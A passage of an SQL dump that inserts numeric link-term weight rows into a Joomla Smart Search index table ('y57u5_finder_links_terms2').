(254, 291961, 2.32339),
(254, 291962, 0.98),
(254, 291963, 0.88669),
(254, 291964, 1.05),
(254, 291965, 1.02669),
(254, 291966, 0.88669),
(254, 291967, 1.00331),
(254, 291968, 1.6),
(254, 291969, 5.2),
(254, 291970, 5.6),
(254, 291971, 0.91),
(254, 291972, 0.98),
(254, 291973, 0.93331),
(254, 291974, 1.07331),
(254, 291975, 0.91),
(254, 291976, 1.02669),
(254, 292060, 0.93331),
(254, 292061, 1.02669),
(254, 292062, 1.00331),
(254, 292063, 0.37331),
(254, 292064, 0.95669),
(254, 292065, 1.05),
(254, 292066, 0.32669),
(254, 292067, 0.93331),
(254, 292068, 1.16669),
(254, 292069, 1.23669),
(254, 292070, 0.98),
(254, 292071, 1.05),
(254, 292072, 1.00331),
(254, 292073, 1.02669),
(254, 292074, 1.00331),
(306, 292074, 1.00331),
(254, 292075, 0.98),
(254, 292076, 1.07331),
(254, 292077, 1.05),
(254, 292078, 0.98),
(254, 292079, 1.02669),
(255, 292750, 0.95669),
(255, 292751, 1.02669),
(255, 292752, 0.93331),
(255, 292753, 1.00331),
(255, 292754, 1.05),
(255, 292755, 0.93331),
(255, 292756, 0.93331),
(255, 292757, 0.95669),
(255, 292758, 1.14331),
(255, 292759, 0.93331),
(255, 292760, 0.91),
(255, 292761, 1.02669),
(255, 292762, 0.28),
(255, 292763, 0.91),
(255, 292764, 1.02669),
(255, 292765, 1.02669),
(255, 292766, 0.98),
(255, 292767, 1.05),
(255, 292768, 2.32339),
(255, 292769, 1.02669),
(255, 292770, 1.12),
(255, 292771, 0.93331),
(255, 292772, 1.07331),
(255, 292773, 0.95669),
(255, 292774, 1.05),
(255, 292775, 0.18669),
(304, 292775, 0.18669),
(255, 292776, 0.86331),
(304, 292776, 0.86331),
(255, 292777, 1.07331),
(304, 292777, 1.07331),
(255, 292778, 0.88669),
(305, 292778, 0.88669),
(255, 292779, 0.98),
(305, 292779, 0.98),
(255, 292780, 1.12),
(255, 292781, 1.02669),
(255, 292829, 0.88669),
(255, 292830, 1.00331),
(255, 292831, 1.07331),
(255, 292832, 0.95669),
(255, 292833, 0.95669),
(255, 292834, 1.02669),
(255, 292835, 0.93331),
(255, 292836, 1.00331),
(255, 292837, 0.91),
(255, 292838, 1.07331),
(255, 292839, 1.02669),
(255, 292840, 1.12),
(255, 292841, 0.91),
(255, 292842, 0.98),
(256, 293326, 0.93331),
(256, 293327, 1.05),
(256, 293328, 0.93331),
(256, 293329, 1.09669),
(256, 293330, 0.95669),
(256, 293331, 1.07331),
(256, 293332, 0.98),
(256, 293333, 0.98),
(256, 293334, 0.98),
(256, 293335, 0.91),
(256, 293336, 1.00331),
(256, 293337, 1.00331),
(256, 293338, 0.95669),
(256, 293339, 7.22019),
(256, 293340, 7.79019),
(256, 293341, 0.95669),
(256, 293342, 1.02669),
(256, 293343, 0.93331),
(256, 293344, 1.05),
(256, 293345, 0.93331),
(256, 293346, 1.12),
(256, 293347, 0.23331),
(256, 293348, 0.93331),
(256, 293349, 1.07331),
(256, 293350, 0.86331),
(256, 293351, 0.98),
(256, 293352, 1.14331),
(256, 293403, 0.37331),
(256, 293404, 0.98),
(256, 293405, 1.07331),
(256, 293406, 0.28),
(256, 293407, 0.93331),
(256, 293408, 1.07331),
(256, 293409, 0.88669),
(256, 293410, 1.14331),
(256, 293411, 0.23331),
(256, 293412, 0.91),
(256, 293413, 1.00331),
(256, 293414, 0.93331),
(256, 293415, 1.02669),
(256, 293416, 1.05),
(256, 293417, 0.93331),
(256, 293418, 0.98),
(256, 293419, 1.05),
(256, 293420, 1.14331),
(256, 293421, 0.91),
(256, 293422, 0.98),
(256, 293423, 1.05),
(256, 293424, 1.00331),
(256, 293425, 1.02669),
(256, 293426, 1.02669),
(256, 293427, 0.98),
(256, 293428, 1.16669),
(256, 293429, 0.93331),
(256, 293430, 1.02669),
(256, 293431, 0.91),
(256, 293432, 1.00331),
(256, 293433, 0.98),
(256, 293434, 1.09669),
(256, 293435, 0.93331),
(256, 293436, 1.02669),
(256, 293437, 1.00331),
(256, 293438, 0.86331),
(256, 293439, 1.00331),
(256, 293440, 0.91),
(256, 293441, 1.02669),
(257, 294339, 0.86331),
(306, 294339, 1.72662),
(257, 294340, 0.95669),
(257, 294341, 1.09669),
(257, 294342, 1.23669),
(257, 294343, 0.91),
(257, 294344, 1.05),
(257, 294345, 1.00331),
(257, 294346, 1.07331),
(257, 294347, 0.91),
(304, 294347, 0.91),
(257, 294348, 0.93331),
(257, 294349, 1.02669),
(257, 294350, 1.05),
(257, 294351, 1.14331),
(257, 294352, 0.95669),
(257, 294353, 0.86331),
(290, 294353, 1.72662),
(257, 294354, 1.07331),
(257, 294355, 0.95669),
(257, 294356, 1.86662),
(257, 294357, 2.05338),
(257, 294358, 7.79019),
(257, 294359, 0.32669),
(257, 294360, 0.95669),
(257, 294361, 1.14331),
(257, 294362, 0.95669),
(257, 294363, 0.93331),
(257, 294364, 1.07331),
(257, 294365, 0.95669),
(257, 294366, 1.14331),
(257, 294367, 0.98),
(257, 294368, 1.07331),
(257, 294369, 1.00331),
(290, 294370, 0.98),
(257, 294370, 2.94),
(257, 294371, 1.16669),
(257, 294372, 1.05),
(257, 294373, 1.09669),
(257, 294374, 1.00331),
(257, 294375, 1.07331),
(257, 294376, 0.88669),
(257, 294377, 0.98),
(257, 294378, 0.42),
(306, 294378, 0.84),
(257, 294379, 0.98),
(257, 294380, 1.02669),
(257, 294381, 0.91),
(257, 294382, 1.02669),
(257, 294383, 1.02669),
(257, 294430, 1.12),
(257, 294431, 1.05),
(257, 294432, 0.95669),
(257, 294433, 0.95669),
(257, 294434, 1.12),
(257, 294435, 0.93331),
(257, 294436, 1.05),
(257, 294437, 0.98),
(257, 294438, 1.05),
(257, 294439, 0.18669),
(257, 294440, 0.86331),
(257, 294441, 0.95669),
(257, 294442, 0.28),
(257, 294443, 0.98),
(257, 294444, 1.07331),
(257, 294445, 0.95669),
(257, 294446, 1.05),
(257, 294447, 1.82),
(257, 294448, 2.05338),
(257, 294449, 0.93331),
(257, 294450, 0.98),
(257, 294451, 1.14331),
(258, 295331, 1.77338),
(258, 295332, 0.98),
(258, 295333, 1.09669),
(258, 295334, 0.88669),
(258, 295335, 1.00331),
(258, 295336, 1.07331),
(258, 295337, 1.07331),
(258, 295338, 0.88669),
(258, 295339, 1.05),
(258, 295340, 0.93331),
(258, 295341, 1.07331),
(258, 295342, 0.84),
(258, 295343, 0.95669),
(258, 295344, 0.93331),
(258, 295345, 1.07331),
(258, 295346, 2.05338),
(292, 295347, 0.91),
(258, 295347, 1.82),
(292, 295348, 1.05),
(258, 295348, 2.1),
(258, 295349, 0.98007),
(258, 295350, 1.09669),
(258, 295351, 1.16669),
(258, 295352, 0.95669),
(258, 295353, 1.09669),
(258, 295354, 1.00331),
(258, 295355, 1.14331),
(305, 295356, 2.15339),
(258, 295356, 7.22019),
(258, 295357, 7.79019),
(258, 295358, 0.95669),
(258, 295359, 1.05),
(258, 295360, 1.72662),
(292, 295360, 1.72662),
(258, 295361, 0.91),
(292, 295361, 1.82),
(258, 295362, 0.95669),
(305, 295363, 0.86331),
(258, 295363, 1.72662),
(258, 295364, 1.96),
(258, 295365, 1.07331),
(258, 295366, 1.02669),
(258, 295367, 1.00331),
(258, 295368, 1.02669),
(258, 295369, 0.95669),
(258, 295433, 0.93331),
(258, 295434, 1.00331),
(258, 295435, 0.84),
(258, 295436, 0.93331),
(258, 295437, 0.28),
(258, 295438, 0.93331),
(258, 295439, 1.00331),
(258, 295440, 1.05),
(258, 295441, 0.88669),
(258, 295442, 1.09669),
(258, 295443, 0.98),
(258, 295444, 1.00331),
(258, 295445, 1.00331),
(258, 295446, 0.93331),
(258, 295447, 1.00331),
(258, 295448, 0.93331),
(258, 295449, 0.28),
(258, 295450, 0.91),
(258, 295451, 1.02669),
(258, 295452, 1.00331),
(258, 295453, 1.07331),
(258, 295454, 1.00331),
(258, 295455, 0.88669),
(258, 295456, 1.02669),
(258, 295457, 1.00331),
(258, 295458, 0.88669),
(258, 295459, 1.00331),
(258, 295460, 0.95669),
(258, 295461, 1.12),
(258, 295462, 0.93331),
(258, 295463, 1.00331),
(258, 295464, 0.98),
(258, 295465, 1.02669),
(258, 295466, 0.98),
(258, 295467, 0.86331),
(258, 295468, 0.93331),
(258, 295469, 0.95669),
(292, 295469, 0.95669),
(258, 295470, 1.07331),
(292, 295470, 1.07331),
(258, 295471, 1.07331),
(258, 295472, 1.05),
(258, 295473, 1.16669),
(258, 295474, 1.05),
(258, 295475, 0.91),
(258, 295476, 1.00331),
(258, 295477, 1.09669),
(258, 295478, 1.02669),
(258, 295479, 1.12),
(258, 295480, 1.02669),
(259, 296185, 7.79019),
(260, 296219, 0.91),
(260, 296220, 1.02669),
(260, 296221, 7.79019),
(261, 296519, 1.05),
(261, 296520, 0.42),
(261, 296521, 0.98),
(261, 296522, 1.12),
(261, 296523, 1.16669),
(261, 296524, 1.4),
(261, 296525, 1.05),
(261, 296526, 0.95669),
(261, 296527, 1.14331),
(261, 296528, 0.93331),
(261, 296529, 1.00331),
(261, 296530, 0.91),
(261, 296531, 1.02669),
(290, 296532, 0.88669),
(306, 296532, 0.88669),
(261, 296532, 3.54676),
(261, 296533, 1.14331),
(261, 296534, 1.16669),
(261, 296535, 0.98),
(261, 296536, 0.98),
(261, 296537, 0.95669),
(261, 296538, 0.88669),
(261, 296539, 0.95669),
(261, 296540, 1.02669),
(261, 296541, 7.79019),
(261, 296542, 0.88669),
(261, 296543, 1.00331),
(261, 296544, 1.02669),
(261, 296545, 1.33),
(261, 296546, 0.95669),
(261, 296547, 1.19),
(261, 296548, 0.93331),
(261, 296549, 1.07331),
(261, 296550, 1.05),
(261, 296551, 1.16669),
(261, 296552, 2.05338),
(261, 296553, 1.12),
(261, 296554, 1.14331),
(261, 296622, 0.88669),
(261, 296623, 1.14331),
(261, 296624, 0.88669),
(261, 296625, 1.02669),
(261, 296626, 0.98),
(261, 296627, 0.95669),
(261, 296628, 0.95669),
(261, 296629, 1.16669),
(261, 296630, 1.19),
(261, 296631, 0.88669),
(261, 296632, 0.98),
(262, 297630, 0.98),
(262, 297631, 0.81669),
(262, 297632, 0.95669),
(262, 297633, 1.86662),
(262, 297634, 1.07331),
(262, 297635, 0.88669),
(262, 297636, 1.02669),
(262, 297637, 1.05),
(262, 297638, 1.05),
(262, 297639, 0.88669),
(262, 297640, 0.86331),
(262, 297641, 0.98),
(262, 297642, 0.84),
(262, 297643, 0.91),
(262, 297644, 0.95669),
(262, 297645, 1.09669),
(262, 297646, 1.23669),
(262, 297647, 1.00331),
(262, 297648, 7.22019),
(262, 297649, 7.79019),
(262, 297650, 0.84),
(262, 297651, 0.93331),
(262, 297652, 1.05),
(262, 297653, 1.14331),
(262, 297654, 2.1),
(262, 297655, 0.93331),
(262, 297656, 1.02669),
(262, 297657, 0.93331),
(262, 297658, 1.02669),
(262, 297659, 0.93331),
(262, 297660, 1.12),
(262, 297661, 1.05),
(262, 297662, 1.00331),
(262, 297663, 1.19),
(262, 297664, 1.00331),
(262, 297665, 0.91),
(262, 297666, 1.02669),
(262, 297667, 1.05),
(262, 297727, 1.07331),
(262, 297728, 2.73),
(262, 297729, 2.05338),
(262, 297730, 1.02669),
(262, 297731, 1.02669),
(262, 297732, 1.07331),
(262, 297733, 1.07331),
(262, 297734, 0.98),
(262, 297735, 1.21331),
(262, 297736, 1.91338),
(262, 297737, 1.02669),
(262, 297738, 1.02669),
(262, 297739, 0.98),
(262, 297740, 1.23669),
(262, 297741, 1.00331),
(262, 297742, 0.95669),
(262, 297743, 0.95669),
(262, 297744, 1.07331),
(262, 297745, 1.00331),
(262, 297746, 0.98),
(262, 297747, 1.05),
(262, 297748, 1.02669),
(262, 297749, 1.00331),
(262, 297750, 1.05),
(262, 297751, 1.00331),
(304, 297752, 0.88669),
(262, 297752, 1.77338),
(304, 297753, 0.93331),
(262, 297753, 1.86662),
(262, 297754, 1.07331),
(263, 299606, 0.91),
(263, 299607, 0.93331),
(263, 299608, 0.93331),
(263, 299609, 1.16669),
(263, 299610, 1.19),
(263, 299611, 0.95669),
(263, 299612, 1.00331),
(263, 299613, 0.88669),
(263, 299614, 0.98),
(263, 299615, 7.79019),
(263, 299616, 0.91),
(263, 299617, 0.98),
(263, 299618, 0.91),
(263, 299619, 1.02669),
(306, 299620, 0.88669),
(263, 299620, 1.77338),
(263, 299621, 0.98),
(263, 299622, 0.95669),
(263, 299623, 0.88669),
(263, 299624, 0.88669),
(263, 299625, 0.93331),
(263, 299626, 0.95669),
(292, 299626, 0.95669),
(263, 299627, 1.09669),
(263, 299628, 1.19),
(263, 299629, 1.02669),
(263, 299630, 1.12),
(263, 299631, 1.00331),
(263, 299632, 0.95669),
(263, 299633, 1.07331),
(263, 299634, 0.93331),
(263, 299635, 2.19338),
(263, 299688, 0.18669),
(263, 299689, 0.86331),
(263, 299690, 1.07331),
(263, 299691, 0.88669),
(263, 299692, 0.95669),
(263, 299693, 0.37331),
(263, 299694, 0.98),
(263, 299695, 1.35331),
(263, 299696, 0.86331),
(263, 299697, 1.16669),
(263, 299698, 0.91),
(263, 299699, 1.02669),
(263, 299700, 0.32669),
(263, 299701, 0.93331),
(263, 299702, 1.09669),
(263, 299703, 0.98),
(263, 299704, 0.88669),
(263, 299705, 0.93331),
(263, 299706, 1.00331),
(263, 299707, 0.91),
(263, 299708, 1.00331),
(263, 299709, 0.93331),
(263, 299710, 1.02669),
(263, 299711, 0.98),
(263, 299712, 0.95669),
(263, 299713, 1.05),
(263, 299714, 0.91),
(263, 299715, 1.05),
(263, 299716, 0.91),
(305, 299716, 0.91),
(263, 299717, 0.98),
(263, 299718, 1.02669),
(263, 299719, 0.93331),
(264, 300510, 0.14),
(264, 300511, 0.81669),
(264, 300512, 0.86331),
(264, 300513, 0.93331),
(264, 300514, 1.02669),
(264, 300515, 1.12),
(264, 300516, 1.07331),
(264, 300517, 1.00331),
(264, 300518, 0.91),
(264, 300519, 0.91),
(264, 300520, 1.02669),
(264, 300521, 0.51331),
(304, 300521, 0.51331),
(264, 300522, 1.09669),
(264, 300523, 1.19),
(264, 300524, 0.95669),
(264, 300525, 1.02669),
(264, 300526, 1.05),
(264, 300527, 1.00331),
(264, 300528, 0.98),
(264, 300553, 0.91),
(264, 300554, 1.05),
(264, 300555, 0.88669),
(264, 300556, 1.00331);
INSERT INTO `y57u5_finder_links_terms2` (`link_id`, `term_id`, `weight`) VALUES
(264, 300557, 1.05),
(264, 300558, 1.12),
(264, 300559, 0.91),
(264, 300560, 1.12),
(264, 300561, 0.98),
(264, 300562, 1.07331),
(267, 301113, 0.91),
(267, 301114, 1.05),
(267, 301115, 0.86331),
(267, 301116, 0.91),
(267, 301117, 0.28),
(267, 301118, 0.91),
(267, 301119, 1.00331),
(267, 301120, 0.88669),
(306, 301120, 0.88669),
(267, 301121, 1.09669),
(267, 301122, 0.86331),
(267, 301123, 0.93331),
(267, 301124, 0.95669),
(267, 301125, 1.05),
(288, 301126, 2.15339),
(267, 301126, 7.22019),
(267, 301127, 7.79019),
(267, 301128, 0.86331),
(267, 301129, 0.98),
(267, 301130, 0.88669),
(267, 301131, 0.95669),
(267, 301132, 0.86331),
(267, 301133, 0.95669),
(267, 301134, 0.91),
(267, 301135, 1.02669),
(267, 301136, 1.02669),
(267, 301137, 0.95669),
(267, 301138, 0.95669),
(267, 301139, 1.07331),
(267, 301140, 0.95669),
(267, 301141, 1.12),
(267, 301142, 0.98),
(267, 301143, 1.00331),
(267, 301144, 0.98),
(267, 301145, 1.02669),
(267, 301146, 1.09669),
(267, 301147, 1.02669),
(267, 301148, 0.88669),
(267, 301149, 0.98),
(267, 301150, 1.86662),
(267, 301151, 1.00331),
(267, 301152, 1.02669),
(267, 301215, 0.91),
(267, 301216, 1.02669),
(267, 301217, 1.05),
(267, 301218, 0.98),
(267, 301219, 1.02669),
(267, 301220, 1.00331),
(267, 301221, 1.07331),
(267, 301222, 0.88669),
(267, 301223, 1.05),
(267, 301224, 0.88669),
(267, 301225, 1.00331),
(267, 301226, 0.32669),
(267, 301227, 0.98),
(267, 301228, 1.14331),
(267, 301229, 1.00331),
(267, 301230, 0.23331),
(267, 301231, 0.88669),
(267, 301232, 1.00331),
(267, 301233, 0.95669),
(267, 301234, 0.93331),
(267, 301235, 0.93331),
(267, 301236, 1.02669),
(267, 301237, 0.88669),
(267, 301238, 1.00331),
(267, 301239, 0.91),
(267, 301240, 1.02669),
(268, 302147, 0.37331),
(268, 302148, 0.95669),
(268, 302149, 1.14331),
(268, 302150, 0.98),
(268, 302151, 1.07331),
(268, 302152, 1.16669),
(268, 302153, 0.98),
(268, 302154, 1.96),
(268, 302155, 7.22019),
(268, 302156, 7.79019),
(268, 302157, 1.05),
(268, 302158, 1.19),
(268, 302159, 0.98),
(268, 302160, 0.95669),
(268, 302161, 1.05),
(268, 302162, 1.09669),
(268, 302163, 1.05),
(268, 302164, 1.05),
(268, 302165, 0.98),
(268, 302166, 1.05),
(268, 302230, 0.91),
(268, 302231, 1.00331),
(268, 302232, 0.93331),
(268, 302233, 0.91),
(268, 302234, 1.02669),
(268, 302235, 0.91),
(268, 302236, 1.02669),
(268, 302237, 1.00331),
(268, 302238, 1.14331),
(268, 302239, 0.91),
(268, 302240, 1.00331),
(268, 302241, 0.93331),
(268, 302242, 1.00331),
(269, 303138, 1.86662),
(269, 303139, 2.19338),
(269, 303140, 0.93331),
(269, 303141, 1.02669),
(269, 303142, 1.02669),
(269, 303143, 0.91),
(269, 303144, 0.98),
(269, 303145, 1.00331),
(269, 303146, 1.05),
(269, 303147, 1.12),
(269, 303148, 1.02669),
(269, 303149, 1.14331),
(269, 303150, 0.91),
(269, 303151, 0.98),
(269, 303152, 1.00331),
(269, 303153, 0.91),
(269, 303154, 1.12),
(269, 303155, 0.93331),
(269, 303156, 1.00331),
(269, 303157, 1.02669),
(269, 303158, 7.22019),
(269, 303159, 7.79019),
(269, 303160, 0.93331),
(269, 303161, 1.02669),
(269, 303162, 0.98),
(288, 303162, 0.98),
(269, 303163, 1.05),
(306, 303164, 0.95669),
(269, 303164, 2.87007),
(269, 303165, 1.05),
(269, 303166, 1.05),
(269, 303167, 1.02669),
(269, 303168, 0.98),
(269, 303169, 1.07331),
(269, 303170, 1.07331),
(269, 303233, 1.72662),
(269, 303234, 1.86662),
(269, 303235, 0.93331),
(269, 303236, 1.05),
(272, 303955, 7.22019),
(272, 303956, 7.79019),
(274, 304226, 0.95669),
(274, 304227, 1.07331),
(274, 304228, 0.88669),
(274, 304229, 1.00331),
(274, 304230, 1.12),
(274, 304231, 0.95669),
(274, 304232, 1.14331),
(274, 304233, 0.98),
(274, 304234, 1.12),
(274, 304235, 0.91),
(274, 304236, 0.93331),
(274, 304237, 1.02669),
(274, 304238, 0.93331),
(274, 304239, 1.00331),
(274, 304240, 0.98),
(274, 304241, 1.09669),
(274, 304242, 1.07331),
(274, 304243, 1.00331),
(274, 304244, 1.12),
(274, 304245, 1.00331),
(274, 304246, 0.32669),
(294, 304246, 0.56004),
(274, 304247, 0.95669),
(274, 304248, 1.07331),
(274, 304249, 7.22019),
(274, 304250, 7.79019),
(274, 304251, 0.93331),
(274, 304252, 1.09669),
(274, 304253, 0.91),
(274, 304254, 1.09669),
(274, 304255, 0.28),
(274, 304256, 0.93331),
(274, 304257, 1.02669),
(274, 304258, 0.86331),
(274, 304259, 0.95669),
(274, 304260, 0.88669),
(274, 304261, 1.09669),
(274, 304262, 0.93331),
(274, 304263, 1.07331),
(274, 304264, 0.98),
(274, 304265, 1.07331),
(274, 304266, 0.91),
(274, 304267, 0.98),
(274, 304268, 1.02669),
(274, 304269, 1.16669),
(274, 304270, 3.82676),
(274, 304271, 4.57324),
(274, 304272, 0.93331),
(274, 304333, 0.04669),
(274, 304334, 0.77),
(274, 304335, 0.93331),
(274, 304336, 0.93331),
(274, 304337, 1.00331),
(274, 304338, 0.88669),
(274, 304339, 0.95669),
(274, 304340, 1.02669),
(274, 304341, 1.09669),
(274, 304342, 0.98),
(274, 304343, 0.93331),
(274, 304344, 1.05),
(274, 304345, 0.88669),
(274, 304346, 1.00331),
(274, 304347, 1.16669),
(274, 304348, 0.91),
(274, 304349, 1.07331),
(274, 304350, 0.95669),
(274, 304351, 1.05),
(274, 304352, 0.98),
(274, 304353, 1.07331),
(274, 304354, 0.98),
(274, 304355, 1.14331),
(275, 305179, 0.98),
(275, 305180, 1.05),
(275, 305181, 1.05),
(306, 305181, 1.05),
(275, 305182, 0.86331),
(275, 305183, 0.93331),
(275, 305184, 7.22019),
(275, 305185, 7.79019),
(275, 305186, 0.98),
(275, 305187, 2.14662),
(275, 305188, 1.16669),
(275, 305189, 1.21331),
(275, 305190, 1.05),
(275, 305191, 1.12),
(275, 305192, 0.98),
(275, 305193, 1.19),
(275, 305194, 0.86331),
(275, 305195, 0.98),
(275, 305257, 7.41),
(275, 305258, 8.16981),
(275, 305259, 1.00331),
(275, 305260, 1.02669),
(275, 305261, 1.19),
(275, 305262, 1.00331),
(275, 305263, 0.88669),
(275, 305264, 0.98),
(275, 305265, 0.98),
(275, 305266, 0.95669),
(306, 305266, 0.95669),
(275, 305267, 0.93331),
(305, 305267, 0.93331),
(275, 305268, 1.00331),
(275, 305269, 1.02669),
(275, 305270, 1.33),
(275, 305271, 1.02669),
(275, 305272, 0.95669),
(275, 305273, 1.12),
(275, 305274, 0.93331),
(275, 305275, 1.07331),
(280, 307597, 7.22019),
(280, 307598, 7.79019),
(287, 312875, 1.00331),
(287, 312876, 0.98),
(287, 312877, 1.19),
(287, 312878, 0.86331),
(287, 312879, 0.98),
(287, 312880, 0.84),
(287, 312881, 0.93331),
(287, 312882, 0.95669),
(287, 312896, 0.88669),
(287, 312897, 0.98),
(287, 312898, 1.02669),
(287, 312899, 1.14331),
(287, 312900, 1.82),
(287, 312901, 1.16669),
(287, 312902, 1.02669),
(288, 313529, 0.91),
(288, 313530, 1.02669),
(288, 313531, 1.02669),
(288, 313532, 1.14331),
(288, 313533, 1.19),
(288, 313534, 0.88669),
(288, 313535, 1.00331),
(288, 313536, 1.02669),
(288, 313537, 0.93331),
(288, 313538, 1.05),
(288, 313539, 0.91),
(288, 313540, 1.00331),
(288, 313541, 0.93331),
(288, 313542, 1.14331),
(288, 313543, 0.98),
(288, 313544, 0.86331),
(288, 313545, 0.98),
(288, 313546, 0.88669),
(288, 313547, 0.95669),
(288, 313548, 0.86331),
(288, 313549, 0.95669),
(288, 313550, 2.32339),
(288, 313551, 1.00331),
(288, 313552, 1.09669),
(288, 313553, 1.82),
(288, 313554, 1.96),
(288, 313555, 0.93331),
(288, 313556, 1.05),
(288, 313557, 1.26),
(288, 313558, 0.23331),
(288, 313559, 0.93331),
(288, 313560, 1.02669),
(288, 313561, 1.00331),
(288, 313562, 1.07331),
(288, 313617, 1.00331),
(288, 313618, 0.98),
(288, 313619, 1.00331),
(288, 313620, 0.93331),
(288, 313621, 1.09669),
(288, 313622, 0.95669),
(288, 313623, 0.91),
(288, 313624, 1.02669),
(290, 315508, 1.00331),
(290, 315509, 1.02669),
(290, 315510, 1.23669),
(290, 315511, 0.88669),
(290, 315512, 0.95669),
(290, 315513, 1.07331),
(290, 315514, 0.88669),
(290, 315515, 1.00331),
(290, 315516, 1.00331),
(290, 315517, 1.05),
(290, 315518, 0.98),
(290, 315519, 1.00331),
(290, 315520, 7.79019),
(290, 315521, 1.02669),
(290, 315522, 1.02669),
(290, 315523, 0.32669),
(290, 315524, 1.00331),
(290, 315525, 1.07331),
(290, 315526, 0.98),
(290, 315527, 0.93331),
(290, 315528, 1.86662),
(290, 315529, 1.02669),
(290, 315530, 1.02669),
(290, 315531, 0.95669),
(290, 315532, 0.91),
(290, 315533, 1.05),
(290, 315534, 1.96),
(290, 315535, 0.95669),
(290, 315536, 1.09669),
(290, 315537, 0.86331),
(290, 315538, 0.93331),
(290, 315539, 1.07331),
(290, 315540, 0.91),
(290, 315541, 1.02669),
(290, 315542, 0.88669),
(290, 315543, 0.98),
(290, 315544, 0.93331),
(290, 315545, 1.05),
(290, 315546, 0.98),
(290, 315572, 1.16669),
(290, 315573, 1.07331),
(290, 315574, 1.16669),
(290, 315575, 2.66007),
(290, 315576, 2.94),
(290, 315577, 0.91),
(290, 315578, 0.98),
(290, 315579, 0.88669),
(290, 315580, 0.98),
(290, 315581, 0.88669),
(290, 315582, 0.98),
(292, 317583, 0.84),
(306, 317583, 1.68),
(292, 317584, 1.07331),
(292, 317585, 1.00331),
(292, 317586, 0.46669),
(292, 317587, 1.05),
(292, 317588, 1.16669),
(292, 317589, 1.00331),
(292, 317590, 1.02669),
(292, 317591, 0.88669),
(292, 317592, 0.95669),
(292, 317593, 1.05),
(292, 317594, 0.91),
(292, 317595, 1.02669),
(292, 317596, 1.12),
(292, 317597, 0.95669),
(292, 317598, 0.98),
(292, 317599, 1.05),
(292, 317600, 0.98),
(292, 317601, 1.19),
(292, 317602, 1.72662),
(292, 317603, 1.86662),
(292, 317604, 0.91),
(292, 317605, 1.00331),
(292, 317606, 1.00331),
(292, 317607, 0.93331),
(292, 317608, 1.05),
(292, 317609, 0.88669),
(292, 317610, 0.98),
(292, 317611, 0.91),
(292, 317612, 0.98),
(292, 317613, 0.88669),
(292, 317614, 0.98),
(292, 317615, 7.22019),
(292, 317616, 7.79019),
(292, 317617, 0.98),
(292, 317618, 1.16669),
(292, 317619, 0.93331),
(292, 317620, 1.02669),
(292, 317621, 0.93331),
(292, 317622, 1.05),
(292, 317623, 0.91),
(292, 317624, 1.02669),
(292, 317625, 1.05),
(292, 317626, 0.86331),
(292, 317627, 0.95669),
(292, 317628, 0.91),
(292, 317629, 1.05),
(292, 317630, 0.93331),
(292, 317631, 1.02669),
(292, 317632, 1.02669),
(292, 317690, 0.28),
(292, 317691, 0.93331),
(292, 317692, 1.02669),
(292, 317693, 0.91),
(292, 317694, 1.09669),
(292, 317695, 0.86331),
(292, 317696, 1.05),
(292, 317697, 1.09669),
(292, 317698, 1.02669),
(292, 317699, 0.86331),
(292, 317700, 1.00331),
(292, 317701, 0.91),
(292, 317702, 1.07331),
(292, 317703, 0.98),
(292, 317704, 0.86331),
(292, 317705, 0.98),
(292, 317706, 0.91),
(292, 317707, 1.12),
(292, 317708, 1.16669),
(292, 317709, 0.98),
(292, 317710, 0.91),
(292, 317711, 1.00331),
(292, 317712, 0.88669),
(292, 317713, 0.95669),
(292, 317714, 0.93331),
(292, 317715, 1.05),
(294, 318440, 4.26688),
(294, 318441, 10.0269),
(294, 318442, 11.9469),
(295, 318468, 0.56),
(295, 318469, 1.77338),
(295, 318470, 0.98),
(295, 318471, 0.98),
(295, 318472, 1.05),
(295, 318473, 1.16669),
(295, 318474, 1.26),
(295, 318652, 1.05),
(295, 318653, 1.19),
(295, 318654, 0.51331),
(295, 318655, 1.02669),
(295, 318656, 1.07331),
(295, 318685, 0.7),
(295, 318686, 1.4),
(295, 318687, 1.4),
(295, 318688, 0.86331),
(295, 318689, 1.00331),
(298, 320187, 0.88669),
(308, 320187, 0.88669),
(298, 320188, 1.09669),
(308, 320188, 1.09669),
(298, 320189, 1.14331),
(308, 320189, 1.14331),
(298, 320190, 1.02669),
(308, 320190, 1.02669),
(298, 320191, 1.07331),
(308, 320191, 1.07331),
(298, 320192, 0.28),
(308, 320192, 0.28),
(298, 320193, 1.00331),
(308, 320193, 1.00331),
(298, 320194, 1.14331),
(308, 320194, 1.14331),
(298, 320232, 0.37331),
(308, 320232, 0.37331),
(298, 320233, 0.95669),
(308, 320233, 0.95669),
(298, 320234, 1.05),
(308, 320234, 1.05),
(298, 320235, 1.05),
(298, 320236, 1.00331),
(308, 320236, 1.00331),
(298, 320237, 1.09669),
(308, 320237, 1.09669),
(298, 320238, 1.02669),
(308, 320238, 1.02669),
(298, 320239, 1.19),
(308, 320239, 1.19),
(298, 320240, 0.93331),
(308, 320240, 0.93331),
(298, 320241, 1.05),
(308, 320241, 1.05),
(298, 320242, 1.05),
(308, 320242, 1.05),
(298, 320243, 1.14331),
(308, 320243, 1.14331),
(299, 320951, 0.88669),
(299, 320952, 1.07331),
(299, 320953, 0.18669),
(299, 320954, 0.98),
(299, 320955, 1.12),
(299, 320956, 0.95669),
(299, 320957, 1.05),
(299, 320958, 1.05),
(299, 320959, 1.05),
(299, 320960, 0.86331),
(299, 320961, 0.93331),
(299, 320962, 0.93331),
(299, 320963, 1.00331),
(299, 320964, 1.91338),
(299, 320965, 2.1),
(299, 320966, 2.00662),
(299, 320967, 0.93331),
(299, 320968, 0.86331),
(299, 320969, 0.95669),
(299, 320970, 0.93331),
(299, 320971, 1.14331),
(299, 320972, 1.09669),
(299, 320973, 0.91),
(299, 320974, 1.14331),
(299, 320975, 0.91),
(299, 320976, 1.02669),
(299, 320977, 1.02669),
(299, 320978, 1.12),
(299, 320979, 1.19),
(299, 320980, 1.68),
(299, 320981, 1.86662),
(299, 320982, 0.88669),
(299, 320983, 0.98),
(299, 320984, 1.07331),
(299, 320985, 0.91),
(299, 320986, 1.02669),
(299, 320987, 0.88669),
(299, 320988, 0.98),
(299, 320989, 1.09669),
(299, 320990, 1.26),
(299, 320991, 0.95669),
(299, 320992, 1.05),
(299, 321096, 0.86331),
(299, 321097, 0.95669),
(299, 321098, 0.32669),
(299, 321099, 0.95669),
(299, 321100, 1.21331),
(299, 321101, 0.95669),
(299, 321102, 0.93331),
(299, 321103, 1.05),
(299, 321104, 0.86331),
(299, 321105, 0.91),
(299, 321106, 1.09669),
(299, 321107, 1.02669),
(299, 321108, 0.93331),
(299, 321109, 1.05),
(299, 321110, 0.88669),
(299, 321111, 1.05),
(299, 321112, 0.88669),
